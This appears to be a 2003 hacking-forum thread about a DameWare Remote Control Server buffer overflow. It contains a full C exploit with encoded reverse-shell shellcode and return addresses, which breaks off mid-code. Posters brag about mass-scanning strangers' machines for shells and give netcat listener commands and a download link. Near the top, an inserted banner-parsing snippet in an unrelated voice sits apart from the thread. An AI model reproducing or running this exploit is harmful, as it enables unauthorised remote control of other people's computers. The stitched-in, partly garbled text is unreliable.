extreme
Is there any tool with which we could scan this port and get some banner in response so we can know what version of dameware it is...

WTF. I get
[+] connecting to IP
error: wrong data recieved

Has anyone else gotten this error??? I get it always..
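An added example for the banner question above (this is not code from the thread or from DameWare): a parser for the two messages the DWRCS handshake on TCP/6129 produces, so a scanner can report the server OS and service pack the way the exploit posted later in this thread does. The message layout is taken from that exploit code: the server greets with bytes 0x30 0x11, and after the client sends its 0x30 0x11 request the server answers 0x10 0x27 followed by the OS version fields at fixed offsets (+8 major, +12 minor, +16 build, +24 CSD string). That layout is consistent with a 4-byte message id followed by a Win32 OSVERSIONINFOA structure, which is my inference rather than something the thread states. All function names are mine, and the sample replies are constructed, not captured.

```c
/* Added example: parse the DWRCS greeting and OS-info reply (offline, constructed input). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DW_CSD_MAX 128                /* szCSDVersion size in OSVERSIONINFOA (inferred) */

struct dw_osinfo {
    uint32_t major, minor, build, platform;
    char csd[DW_CSD_MAX];             /* e.g. "Service Pack 4", may be empty */
    int sp;                           /* parsed service pack number, 0 if none */
    const char *name;                 /* "Windows 2000", ... or "unknown" */
};

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* First bytes the server sends on connect: 0x30 0x11. */
int dw_is_greeting(const unsigned char *buf, size_t len)
{
    return len >= 2 && buf[0] == 0x30 && buf[1] == 0x11;
}

static const char *dw_os_name(uint32_t major, uint32_t minor)
{
    if (major == 4) return "Windows NT 4.0";
    if (major == 5 && minor == 0) return "Windows 2000";
    if (major == 5 && minor == 1) return "Windows XP";
    if (major == 5 && minor == 2) return "Windows 2003";
    return "unknown";
}

/* Parse the 0x10 0x27 reply. Returns 0 on success, -1 if the buffer is not an
 * OS-info message or is too short to hold the fixed fields. */
int dw_parse_osinfo(const unsigned char *buf, size_t len, struct dw_osinfo *out)
{
    size_t n;
    if (len < 24 || buf[0] != 0x10 || buf[1] != 0x27) return -1;
    memset(out, 0, sizeof(*out));
    out->major    = le32(buf + 8);
    out->minor    = le32(buf + 12);
    out->build    = le32(buf + 16);
    out->platform = le32(buf + 20);
    /* CSD string: bounded by the buffer and the 128-byte field; never assumed NUL-terminated */
    n = len - 24;
    if (n > DW_CSD_MAX - 1) n = DW_CSD_MAX - 1;
    memcpy(out->csd, buf + 24, n);
    out->csd[n] = '\0';
    if (strncmp(out->csd, "Service Pack ", 13) == 0) out->sp = atoi(out->csd + 13);
    out->name = dw_os_name(out->major, out->minor);
    return 0;
}

/* Build a constructed reply of the shape described above (for offline testing only). */
size_t dw_build_sample_reply(unsigned char *buf, size_t cap, uint32_t major, uint32_t minor,
                             uint32_t build, const char *csd)
{
    size_t need = 24 + DW_CSD_MAX;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 0x10; buf[1] = 0x27;
    put32(buf + 4, 148);              /* sizeof(OSVERSIONINFOA), per the inferred layout */
    put32(buf + 8, major);
    put32(buf + 12, minor);
    put32(buf + 16, build);
    put32(buf + 20, 2);               /* VER_PLATFORM_WIN32_NT */
    strncpy((char *)buf + 24, csd, DW_CSD_MAX - 1);
    return need;
}

int main(void)
{
    unsigned char reply[256];
    struct dw_osinfo info;
    size_t len = dw_build_sample_reply(reply, sizeof(reply), 5, 0, 2195, "Service Pack 4");
    if (dw_parse_osinfo(reply, len, &info) == 0)
        printf("%s [ver %u.%u.%u] %s (SP %d)\n", info.name, (unsigned)info.major,
               (unsigned)info.minor, (unsigned)info.build, info.csd, info.sp);
    return 0;
}
```

To use it against a live host you would connect to port 6129, check the first two bytes with dw_is_greeting(), send the 40-byte request the exploit below calls send_buff, and hand the reply to dw_parse_osinfo(); nothing in this check overflows anything, so it is safe to run as a version survey.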
DaywalkerX
Why not Win2000? I found so many Win2000 servers with DameWare.
BTW, n02 after real server.
But most machines I found have AV... and are routed :/
GhostCow
Great stuff, it works like a charm.
psycho-lvlantis
Very good stuff man, have to try it.
X-FloppY
Auto hacker: I'll try to build one.
Hexboy
Interesting code. Software these days...
Axl
QUOTE (UnDeRTaKeR @ Dec 21 2003, 09:36 PM)
Well, I don't have complaints... it all worked perfectly for me...
I got something like 20 shells from that nice exploit.

Ack, mine used to work, and then when I redownloaded nothing works. I do nc -l -vv -p 15, then I run DameWeird *.*.*.* *.*.*.* 15; it tells me the shell should have arrived at *.*.*.*:15 and it never does.
LiQuid
QUOTE (QuantumTopology @ Dec 27 2003, 12:59 AM)
QUOTE (UnDeRTaKeR @ Dec 21 2003, 09:36 PM)
Well, I don't have complaints... it all worked perfectly for me...
I got something like 20 shells from that nice exploit.

Ack, mine used to work, and then when I redownloaded nothing works. I do nc -l -vv -p 15, then I run DameWeird *.*.*.* *.*.*.* 15; it tells me the shell should have arrived at *.*.*.*:15 and it never does.

Maybe the server is firewalled?
Axl
QUOTE (LiQuid @ Dec 27 2003, 03:46 AM)
QUOTE (QuantumTopology @ Dec 27 2003, 12:59 AM)
QUOTE (UnDeRTaKeR @ Dec 21 2003, 09:36 PM)
Well, I don't have complaints... it all worked perfectly for me...
I got something like 20 shells from that nice exploit.

Ack, mine used to work, and then when I redownloaded nothing works. I do nc -l -vv -p 15, then I run DameWeird *.*.*.* *.*.*.* 15; it tells me the shell should have arrived at *.*.*.*:15 and it never does.

Maybe the server is firewalled?

Hmm... I don't know, it used to work, but lately they haven't been, even when I use, say, port 6129.
Alien
This exploit is great, I was scanning for 5 min. and got 30 shells :]
Thanks for sharing.
Axl
QUOTE (Alien @ Dec 27 2003, 08:08 AM)
This exploit is great, I was scanning for 5 min. and got 30 shells :]
Thanks for sharing.

I want shells again, it's upsetting me.
klassik
Maybe you should go buy one? HEEHEE.

Nice exploit.
TmZ
The exploit works fine; if you can't get it to work you're really doing something wrong, because it's hell easy. But the exploit is dying pretty fast, so don't expect to get many shells anymore...

Greetz
TmZ
Axl
QUOTE (klassik @ Dec 27 2003, 09:25 AM)
Maybe you should go buy one? HEEHEE.

Nice exploit.

Shut up klassik, you are worthless.... making me scan for the lame exploit and make the automatic installing packs, damn you bastard, hahah. LOL, later dude. And TmZ, you are stupid telling me I'm doing something wrong, because I'm not. Well, I'm gonna say it's something with my Windows install, 'cause I tried running netcat on a bot of mine and it worked...
dozolax01
Yeah... I found that the first time I used the exploit it worked fine, but it seems lately that after I apply the exploit, I never receive a shell. I'm not sure why, but it is a good exploit.
Feanor
This exploit worked for me, but not many vulnerable comps for me...
Hellraiseruk
Can't someone make this prog remote friendly? LOL

Every time I go to DMZ mode and then try this, it works for a bit, then screws my connection, then I have to reset my router and DMZ mode is off, so back where I started.

And I tried that nc, but still my goddamn router blocks it, LOL.
l0wkey
I haven't been able to see ANY vuln hosts. Must be dying off quick.
tazthedev
IM IN !!!

IT WORKS !! biggrin.gif biggrin.gif

- Versions vulnerable: <= DWRCS 3.72.0.0
- Tested on: DWRCS ver: 3.72.0.0 Win2k Pro SP3 & WinXP Pro S

[*] Target IP: xxx.xxx.xxx.xxx Port: 6129
[*] Local IP: xxx.xxx.xxx.xxx Listening Port: 4821

[*] Initializing sockets... [ OK ]
[*] Binding to local port: 4821... [ OK ]
[*] Setting up a listener... [ OK ]
[*] Connecting to xxx.xxx.xxx.xxx:6129... [ OK ]

packets_recv = 4096

OS Info : WIN2000 [ver 5.0.2195]
SP String : Service Pack 4

EIP: 0x717564b8 (comctl32.dll)

[*] Constructing packet for WIN 2000 SP: 4... [ OK ]
[*] Packet injected!
[*] Connection request accepted: xxx.xxx.xxx.xxx:1071
[*] Dropping to shell...

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
rush
Damned people, many people in here just want to hack to show off or what?
Suc6 to the real hackers!
Jimbras
Xi, I'm getting tired.

Always getting.... error: connection refused
zero-maitimax
QUOTE (rush @ Dec 30 2003, 02:03 PM)
Damned people, many people in here just want to hack to show off or what?
Suc6 to the real hackers!

I don't think they show off..

They only let us see that the exploit indeed works and is not just a public version with bugs, where the program doesn't work..
Feanor
QUOTE (Jimbras @ Dec 30 2003, 04:01 PM)
Xi, I'm getting tired.

Always getting.... error: connection refused

It's just that there aren't many vulnerable servers.
ST.
If you can't compile something, just go to your victim and ask him "hey, I want to see some files on your computer"; I'm sure he will show you.
zero-maitimax
QUOTE (ST. @ Dec 30 2003, 09:43 PM)
If you can't compile something, just go to your victim and ask him "hey, I want to see some files on your computer"; I'm sure he will show you.

I don't want to start a flame war, but I think we aren't stupid, so even the victim isn't stupid...
tstngry
I am having trouble compiling the exploit. I use Dev-C++, and when I do it, it says there were a whole bunch of errors. Do I need to choose some option based on what the code was written in, or do I need a different prog? If so, what one? Thanks in advance!
QuadMedic
This sploit worked great, thanks to the compilers....... but it is dying fast now.
headbanger
Great exploit, it works great! Thanks dude.
tstngry
May I just ask what program you guys used to compile this? I tried Bloodshed C++, but I get errors. I would really like to know what program to use. BTW, I understand C++, and am not a script kiddie! THNX
Cow|
For all the people who couldn't compile it, here you can find a good version: h**p://www.security.nnov.ru/files/dmware.rar
rush
Cow|, just try that version, it won't work.
There aren't good public xploits of this one, so far as I know..
Cow|
It works, I got shells with it. When you are using a router, you need to open a port for it. Example: your return port = 70, then open port 70 on your router and that is it, no netcat required for this one.
Gargamel
@Cow
I have a router and I open my return port, but I didn't get a shell, although I should get one ("shell should be arrived at xxx:xx" or so), and this over 30 times.

But a friend could connect to my netcat over telnet without problems. Anyone know what to do?

Sorry for my bad English.
Lanig
Could be just bad luck...
Even if it says that the shell should arrive, there's a good chance it won't.
BillyJawz
Well, that sploit still isn't running on my XP box (got to have some debug on it). Did anyone find good EIP return addresses in his favorite debugger?

Did find the one that works for Adik's sploit (seems like the Metasploit addresses aren't up to date) -> jmp esp address in advapi32.dll. Works great, but hardcoded addresses suck.

Cya

Steffan
Found something on the web, but I got no source/binary.. Anybody got it here??

I must have this one!!!

[+]-------------------------------------------------------------[+]
[+] Dameware Autoh4x0r V.0.7a 3.72.0.0 Exploit moded by M@steR [+]
[+] removed the l4m3-stuff from netninja + add UNI-RET [+]
[+]-------------------------------------------------------------[+]
[+] Initializing sockets...
[+] OS Info :
[+] WIN2000 [ver 5.0.2195] SP String :
[+] Constructing packet for WIN 2000 SP: 0...
[+] Connecting to 192.168.144.2:6129...
[+] Inject packet and shellcode ...
[+] Packet & shellcode injected!

>nc -v 192.168.144.2 9191
xxxxxx [192.168.144.2] 9191 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.

C:\>

[+]-------------------------------------------------------------[+]
[+] Dameware Autoh4x0r V.0.9a <3.72.0.0 Exploit moded by M@steR [+]
[+] removed the l4m3-stuff from netninja + add UNI-RET [+]
[+]-------------------------------------------------------------[+]
[-] Usage: dmware <Target> <TGTport> <IP> <Port> (default)
[-] or bindshell -> <Target> <TGTport> <options>
[-] -s bind a shell & connect to
[-] -a Autoh4x0r using requests.txt as cmd.file
[-] -b brute force RET-Address
BillyJawz
Looks interesting indeed, haven't heard of any UNI RET yet...

F30R
Nice, I'm searching for the .c

If you have the files, could you PM me?

Thanks a lot
ara
Many thanks to kralor, a fine piece of work.
thotho
Great exploit, thanks.
cha0s
Works great.
babbacool
Thanks for this exploit, I'm gonna test it...

Damn, I'm a bit late for this one. I hope that I'll get some shell...
Copkill
Yes, it is very late.

Great exploit, I've got many shells.

Big thanks
BillyJawz
Hi all,

Here is a mix of Adik's exploit and the one posted here... keeps the best of each (better SP management by Adik and no nc needed, better connections and error report by Crpt).
It uses the same RET values, so nothing very new, but I like it like that.

CODE



/*******************************************************************************
*
*  DameWare Remote Control Server Stack Overflow Exploit
*  
*  Discovered by:   wirepair
*  Exploit by:    Adik [ netmaniac (at) hotmail.KG ]  
*  Tweaked by:   Alb@t0r
*  Vulnerable Versions: <= 3.72.0.0
*  Tested on:    3.72.0.0 Win2k SP3 & WinXp SP3
*  Payload:    Reverse Connect Shellcode, exits gracefully
*        doesn't terminate remote process.
*  
* [16/Dec/2003] Bishkek
*******************************************************************************/


#include <stdio.h>
#include <stdlib.h>   /* atoi(), exit() */
#include <string.h>
#include <io.h>       /* read()/write() on the console (MSVC/MinGW CRT) */
#include <winsock.h>
//#include "netmaniac.h"
#pragma comment(lib,"ws2_32.lib")
#define ACCEPT_TIMEOUT 10 /* seconds to wait for the reverse shell to connect back */
#define RECVTIMEOUT  15   /* seconds to wait for each reply from the server */

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "johny"
#define WINHOST "DTCi_home"
#define USERPROFILE_NAME "johnny moohre"
#define USERPROFILE_COMPANY "geek solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "your_domain"
#define CLIENT_VERSION "3.72.0.0"

#define ID_UNKNOWN  0
#define ID_WIN2K  1
#define ID_WINXP  2
#define ID_WIN2K3  3
#define ID_WINNT  4
#define VER    "0.5"
//#include "dmware.rc"

/*******************************************************************************/  
unsigned char send_buff[40] = {
0x30, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xC3, 0xF5, 0x28, 0x5C, 0x8F, 0xC2, 0x0D, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
};

unsigned char kyrgyz_rshell[] = { //418
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xa2, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0xEE, 0x09, 0x64, 0x08, 0x88, 0x60, 0xAE, 0x89, 0x88, 0x88, 0x01,
0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xA3, 0x89, 0x88, 0x88, 0x01,
0xCE, 0x64, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x64,
0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0x82, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x56, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0x72, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x52, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x62, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x5E, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x52, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x42, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x64, 0x71, 0x22, 0xE8, 0x60, 0x32, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x22, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x6A, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88,
0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03,
0x50, 0xE0, 0x48, 0x20, 0xB7, 0x89, 0xE0, 0x8A, 0x88, 0xAA, 0x99, 0x03, 0x44, 0xE2, 0x98, 0xD9,
0xDB, 0x77, 0xDE, 0x60, 0x0D, 0x48, 0xFD, 0xD2, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x5A,
0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75,
0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x76, 0xCC, 0xAC, 0xB6, 0x01, 0xD4, 0xAC,
0xC0, 0x01, 0xD4, 0xAC, 0xC4, 0x01, 0xD4, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9,
0xD9, 0xD9, 0x4E, 0xCC, 0xAC, 0x8B, 0x80, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x5A, 0xD9,
0x77, 0xDE, 0x52, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x56, 0x03, 0x40, 0xDB, 0x77,
0xDE, 0x6A, 0x77, 0xDE, 0x5E, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03,
0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4,
0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2,
0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48,
0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C,
0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55,
0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A,
0x8C, 0x88
};

/*******************************************************************************/
long gimmeip(char *hostname);
void cmdshell (int sock);

struct timeval tv;
fd_set fds;  
//char recv_buff1[5000]="";
/***********************-( os jmp esp offsets )-********************************/
struct sp_levels
{
unsigned long eip;
char library[20];
};
/*************-[ offsets grabbed from www.metasploit.com ] remix by Alb@t0r *********************/
struct
{
//int sp;
//unsigned long eip;
char os_type[10];
struct sp_levels sp[7];

} target_os[]=
{
{
 "UNKNOWN",{{0,""},{0,""},{0,""},{0,""},{0,""},{0,""},{0,""}}  
},
{
  "WIN 2000",
  {{ 0x750362c3,"ws2_32.dll" },{ 0x75035173,"ws2_32.dll" },{ 0x717564B8,"comctl32.dll" },
  {  0x717564B8,"comctl32.dll" },{ 0x717564B8,"comctl32.dll" },{ 0,"" },{ 0,"" } } //sp3 OK 0x77dc6d03, sp4 OK 0x7c2ec68b
},


{
  "WIN XP",
  {  { 0x71ab7bfb,"ws2_32.dll" },{ 0x773AD507,"advapi32.dll" },{ 0,"" },
   { 0,"" },{ 0,"" },{ 0,"" },{ 0,"" } } //2 SPs on WinXP, 0x77e2d9d3, 0x773E19C3 on my machine (XP SP1 US)
},
{
  "WIN 2003",
  {{0x77db565c,"advapi32.dll"},{0,""},{0,""},{0,""},{0,""},{0,""},{0,""}}//SP 0??
},
{
  "WIN NT4",
  { // only SP3 + SP 6 r filled in
  { 0x77777777,"unknown.dll" },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },
  { 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll" },{ 0x77777772,"unknown.dll" },
  { 0x77f9d463,"kernel32.dll" }  
  }//6 SP  
}

};
/****************************************************************************/


int main(int argc,char *argv[])
{    
 WSADATA wsaData;      
 struct sockaddr_in targetTCP, localTCP, inAccTCP;
 int sockTCP,localSockTCP,accSockTCP, acsz;
 u_long switchon;              /* ioctlsocket(FIONBIO) takes a u_long* */
 char buffer[SIZEOF];
 unsigned short local_port, target_port;
 unsigned long local_ip, target_ip;
 unsigned int os_sp=0;
 int os_ver=0;
 printf("\n...oO DameWare Remote Control Server Overflow Exploit Oo...\n");
 printf("-( by Adik netmaniac[at]hotmail.KG )& tweaked by Alb@t0r -\n");
 printf(" - Versions vulnerable: <= DWRCS 3.72.0.0\n");
 /* The target port is fixed at 6129 (PORT); argv[2]/argv[3] are the connect-back
    IP and port, so three arguments are required. */
 if(argc < 4)
 {
  printf(" Usage: %s <TargetIP> <YourIp> <YourPort>\n"
    " eg: %s 10.0.0.1 10.0.0.2 21\n\n",argv[0],argv[0]);
  return 1;  
 }    
 
 WSAStartup(0x0202, &wsaData);    
 target_port = PORT;            

 local_port = htons((unsigned short)atoi(argv[3]));
 local_ip = inet_addr(argv[2]);
 local_port ^= 0x8888;
 local_ip ^= 0x88888888;

 *(unsigned long *)&kyrgyz_rshell[194+27] = local_ip; //27 is size of un-XORer
 *(unsigned short *)&kyrgyz_rshell[201+27] = local_port;  

 printf( "[*] Target IP:\t%s \tPort: %d\n"
   "[*] Local IP:\t%s \tListening Port: %s\n\n",argv[1],PORT,argv[2],argv[3]);

 target_ip=gimmeip(argv[1]);
        memset(&targetTCP, 0, sizeof(targetTCP));
 memset(&localTCP, 0, sizeof(localTCP));
 
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = target_ip;
        targetTCP.sin_port = htons(target_port);    
     
 localTCP.sin_family = AF_INET;
        localTCP.sin_addr.s_addr = INADDR_ANY;
        localTCP.sin_port = htons((unsigned short)atoi(argv[3]));

 printf("[*] Initializing sockets...");

        if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
 {
   printf("\t\t\t[ FAILED ]\n Socket1 not initialized! Exiting...\n");
   WSACleanup();
               return 1;
 }
 if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
 {
   printf("\t\t\t[ FAILED ]\n Socket2 not initialized! Exiting...\n");
   WSACleanup();
               return 1;
 }
 printf("\t\t\t[ OK ]\n");

 printf("[*] Binding to local port: %s...",argv[3]);

 if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0)
 {
   printf("\t\t[ FAILED ]\n Failed binding to port: %s! Exiting...\n",argv[3]);
   WSACleanup();
               return 1;
 }

 printf("\t\t[ OK ]\n");
 printf("[*] Setting up a listener...");
 if(listen(localSockTCP,1) != 0)
 {
   printf("\t\t\t[ FAILED ]\nFailed to listen on port: %s! Exiting...\n",argv[3]);
   WSACleanup();
               return 1;
 }
 printf("\t\t\t[ OK ]\n");
 
 printf("[*] Connecting to %s:%d...",argv[1],PORT);  

 
 //START check
 
 
 if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
 {
  printf("\n[x] Connection to host failed! Exiting...\n");
  WSACleanup();
  exit(1);
 }  

 switchon=1;
 ioctlsocket(sockTCP,FIONBIO,&switchon);
 tv.tv_sec = RECVTIMEOUT;
 tv.tv_usec = 0;
 FD_ZERO(&fds);
 FD_SET(sockTCP,&fds);

 memset(buffer,0,SIZEOF);
 if((select(sockTCP+1,&fds,0,0,&tv))>0)
 {
  /* the greeting check below reads buffer[0..1], so a short read must not be treated as data */
  if(recv(sockTCP, buffer, sizeof(buffer),0) < 2)
  {
   printf("\n[x] error: short read on greeting\r\n");
   WSACleanup();
   return 1;
  }
 }
 else
 {
  printf("\n[x] Timeout! Doesn't appear to be a DMWRCS\n");
  WSACleanup();
  exit(1);
 }
 /* DWRCS greets with 0x30 0x11 ... */
 if(buffer[0]!=0x30||buffer[1]!=0x11)
 {
  printf("\n[x] error: wrong data received\r\n");
  WSACleanup();
  return 1;
 }
 switchon=0;
 ioctlsocket(sockTCP,FIONBIO,&switchon);

 if (send(sockTCP, send_buff, sizeof(send_buff),0) == -1)
 {
   printf("\n[x] Failed to inject packet! Exiting...\n");
   WSACleanup();
               return 1;
 }
 
 switchon=1;
 ioctlsocket(sockTCP,FIONBIO,&switchon);
 tv.tv_sec = RECVTIMEOUT;
 tv.tv_usec = 0;
 FD_ZERO(&fds);
 FD_SET(sockTCP,&fds);
 
 memset(buffer,0,SIZEOF);
 if((select(sockTCP+1,&fds,0,0,&tv))>0)
 {
  recv(sockTCP, buffer, sizeof(buffer),0);  
  //closesocket(sockTCP);
 }
 else
 {
   printf("\n[x] Timeout! Failed to receive packet! Exiting...\n");
   WSACleanup();
               return 1;
 }    

 if(buffer[0]!=0x10||buffer[1]!=0x27)
 {
 printf("\n[x] error: wrong data received from server..\r\n");
 WSACleanup();
 return 1;
 }

 printf("\n OS Info   : ");
 if(buffer[8]==5 && buffer[12]==0)
 {  
  printf("WIN2000 [ver 5.0.%d]\n SP String : %-1.20s\n",*(unsigned short *)&buffer[16],&buffer[24]);
  os_sp = atoi(&buffer[37]);
  //closesocket(sockTCP);
  os_ver = ID_WIN2K;
 }
 else if(buffer[8]==5 && buffer[12]==1)
 {  
  printf("WINXP [ver 5.1.%d]\n SP String : %-1.20s\n",*(unsigned short *)&buffer[16],&buffer[24]);
  os_sp = atoi(&buffer[37]);
  //closesocket(sockTCP);
  os_ver = ID_WINXP;
 }
 else if(buffer[8]==5 && buffer[12]==2)
 {  
  printf("WIN2003 [ver 5.2.%d]\n SP String : %-1.20s\n",*(unsigned short *)&buffer[16],&buffer[24]);
  os_sp = atoi(&buffer[37]);
  //closesocket(sockTCP);
  os_ver = ID_WIN2K3;
 }
 else if(buffer[8]==4)
 {  
  printf("WINNT4\n SP String : %-1.20s\n",&buffer[24]);
  os_sp = atoi(&buffer[37]);
  //closesocket(sockTCP);
  os_ver = ID_WINNT;
 }
 else
 {
  printf("UNKNOWN: ");
  printf("Data received looks like %d.%d.%d %-1.20s\n", *(unsigned short *)&buffer[8],*(unsigned short *)&buffer[12],*(unsigned short *)&buffer[16], &buffer[24]);
  //closesocket(sockTCP);
  os_sp = 7;
  os_ver = ID_UNKNOWN;
 }  
 
 //End Check
 
 if (os_ver == ID_UNKNOWN)
 {
   printf("[ FAILED ] Failed to identify WIN version \n");
   WSACleanup();
   return 1;
 }
 /* sp[] has 7 slots; the SP number comes from the server's string, so bound it before indexing */
 if (os_sp > 6 || !target_os[os_ver].sp[os_sp].eip)
 {
   printf("[ FAILED ] Dont know that offset yet, exiting...\n");
   WSACleanup();
   return 1;
 }
 printf("\nEIP: 0x%lx (%s)\n\n",target_os[os_ver].sp[os_sp].eip,target_os[os_ver].sp[os_sp].library);
 printf("[*] Constructing packet for %s SP: %d...",target_os[os_ver].os_type,os_sp);    
 //memcpy(buffer,"\x10\x27",2);    
 //memcpy(send_packet+500,"neTmaNiac",strlen("netmaniac"));
 memset(&buffer[2],0,SIZEOF-2);
 strcpy(&buffer[175],WINUSER);
 memset(&buffer[416],0x90,180);
 
 *(unsigned long*)&buffer[516] = target_os[os_ver].sp[os_sp].eip;
 
 /* sizeof, not strlen: a connect-back octet of 0x88 is stored XORed as 0x00 and would truncate a strlen copy */
 memcpy(&buffer[520],kyrgyz_rshell,sizeof(kyrgyz_rshell));  
 strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
 strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
 strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
 strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
 strcpy(&buffer[2795],CLIENT_VERSION);
 
 printf("\t[ OK ]\n");
 
   
 switchon=0;
 ioctlsocket(sockTCP,FIONBIO,&switchon);

 if (send(sockTCP, buffer, sizeof(buffer),0) == -1)
 {
   printf("[x] Failed to inject packet! Exiting...\n");
   WSACleanup();
               return 1;
 }
 
 switchon=1;
 ioctlsocket(sockTCP,FIONBIO,&switchon);
 tv.tv_sec = RECVTIMEOUT;
 tv.tv_usec = 0;
 FD_ZERO(&fds);
 FD_SET(sockTCP,&fds);

 memset(buffer,0,SIZEOF);
 
 if((select(sockTCP+1,&fds,0,0,&tv))>0)
 {
  recv(sockTCP, buffer, sizeof(buffer),0);  
 }
 else
 {
   printf("\n[x] Timeout! Failed to receive packet! Exiting...\n");
   WSACleanup();
               return 1;
 }  
 
 printf("[*] Packet injected!\n");
 closesocket(sockTCP);
 
 if(buffer[0]!=0x32||buffer[1]!=0x11)
 {
 printf("[x] Patched ?\r\n");
 //return -1;
 }
     
 printf("[*] Waiting for incoming connection...\r");

 switchon=1;
 ioctlsocket(localSockTCP,FIONBIO,&switchon);
 tv.tv_sec = ACCEPT_TIMEOUT;
 tv.tv_usec = 0;
 FD_ZERO(&fds);
 FD_SET(localSockTCP,&fds);

 if((select(1,&fds,0,0,&tv))>0)
 {
  acsz = sizeof(inAccTCP);
  accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
  printf("[*] Connection request accepted: %s:%d\n", inet_ntoa(inAccTCP.sin_addr), (int)ntohs(inAccTCP.sin_port));
  printf("[*] Dropping to shell...\n\n");
  cmdshell(accSockTCP);
 }
 else
 {
   printf("\n[x] Exploit appears to have failed!\n");
